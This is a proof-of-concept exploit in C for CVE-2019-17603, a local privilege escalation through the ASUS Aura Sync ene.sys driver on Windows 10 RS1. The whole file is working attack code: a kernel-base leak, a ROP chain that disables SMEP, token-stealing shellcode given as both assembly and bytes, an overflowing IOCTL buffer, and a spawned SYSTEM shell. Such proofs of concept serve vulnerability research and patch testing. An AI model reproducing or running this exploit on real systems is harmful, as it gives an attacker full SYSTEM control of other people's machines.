ASUS Aura Sync 1.07.71 Privilege Escalation Exploit

// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040

unsigned long long kernelBase()
{

  // Defining EnumDeviceDrivers() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;

  // Calling EnumDeviceDrivers()
  printf("[+] Calling EnumDeviceDrivers()...\n");

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // ntoskrnl.exe is the first module dumped in the array
  // Typcasting LPVOID to unsigned long long
  unsigned long long krnlBase = (unsigned long long)lpImageBase[0];

  // Print update for kernel base
  printf("[+] Found kernel leak!\n");
  printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase);

  return krnlBase;
}

void exploitWork(void)
{
  /*
    [BITS 64]
    _start:
      mov rax, [gs:0x188]  ; Current thread (_KTHREAD)
      mov rax, [rax + 0xb8]  ; Current process (_EPROCESS)
      mov rbx, rax    ; Copy current process (_EPROCESS) to rbx
    __loop:
      mov rbx, [rbx + 0x2e8]   ; ActiveProcessLinks
      sub rbx, 0x2e8    ; Go back to current process (_EPROCESS)
      mov rcx, [rbx + 0x2e0]   ; UniqueProcessId (PID)
      cmp rcx, 4     ; Compare PID to SYSTEM PID 
      jnz __loop    ; Loop until SYSTEM PID is found
      mov rcx, [rbx + 0x358]  ; SYSTEM token is @ offset _EPROCESS + 0x358
      and cl, 0xf0    ; Clear out _EX_FAST_REF RefCnt
      mov [rax + 0x358], rcx  ; Copy SYSTEM token to current process
      xor rax, rax    ; STATUS_SUCCESS
      add rsp, 0xa0    ; Restore execution
      ret      ; Done!
  */
  
  char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80"
       "\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0"
       "\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48"
       "\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04"
       "\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80"
       "\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0"
       "\x48\x81\xC4\xA0\x00\x00\x00\xC3";

  // Allocating shellcode in user mode
  LPVOID shellcode = VirtualAlloc(
    NULL,
    sizeof(payload),
    0x3000,
    0x40
    );

  // Error handling
  if (!shellcode)
  {
    printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print statement for exploit
  printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n");

  // Print update for shellcode location
  printf("[+] Shellcode allocated at: 0x%llx\n", shellcode);

  // Moving memory into allocated space in user mode
  RtlMoveMemory(
    shellcode,
    payload,
    sizeof(payload)
    );

  // Running kernelBase() here to get base of kernel for ROP gadgets
  unsigned long long baseAddress = kernelBase();

  // Defining buffer and buffer size to send to the driver
  char buf [88];
  size_t gadgetSize = 0x8;

  // ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
  // Run rp++ on the target before execution to adjust offsets accordingnly
  // rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe

  // Defining ROP gadgets
  unsigned long long ROP1 = baseAddress + 0x4666b;  // pop rcx ; ret: ntoskrnl.exe
  unsigned long long ROP2 = 0x70678;      // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
  unsigned long long ROP3 = baseAddress + 0x1d87d7;  // mov cr4, rcx ; ret: ntoskrnl.exe

  // Using memset to copy memory into array
  memset(buf, 0x41, 88);

  // Print update for ROP chain
  printf("[+] Exedcuting ROP chain to disable SMEP...\n");
  memcpy(&buf[56], &ROP1, gadgetSize);
  memcpy(&buf[56+8], &ROP2, gadgetSize);
  memcpy(&buf[56+16], &ROP3, gadgetSize);
  memcpy(&buf[56+24], &shellcode, 0x8);

  // Obtaining handle to the driver
  printf("[+] Obtaining handle to the driver via CreateFileA()...\n");
  HANDLE drvHandle = CreateFileA(
    "\\\\.\\EneIo",
    0xC0000000,
    0x0,
    NULL,
    0x3,
    0x0,
    NULL
  );

  // Error handling
  if (!drvHandle)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print update for HANDLE
  printf("[+] Handle to the driver: %d\n", drvHandle);

  // Sending buffer to the driver

  // Defining lpBytesReturned parameter
  DWORD lpBytesReturned;
  
  // Invoking IOCTL routine
  BOOL sendIoctl = DeviceIoControl(
    drvHandle,
    IOCTL_CODE,
    buf,
    sizeof(buf),
    NULL,
    0,
    &lpBytesReturned,
    NULL
    );

  // Error handling
  if (!sendIoctl)
  {
    printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  printf("[+] Interacting with the driver...\n");
}

int main(int argc, char *argv[])
{
  exploitWork();

  // Print update for NT AUTHORITY\SYSTEM shell
  printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

  // Spawning an NT AUTHORITY\SYSTEM shell
  system("cmd.exe /c cmd.exe /K cd C:\\");

  return 0;
}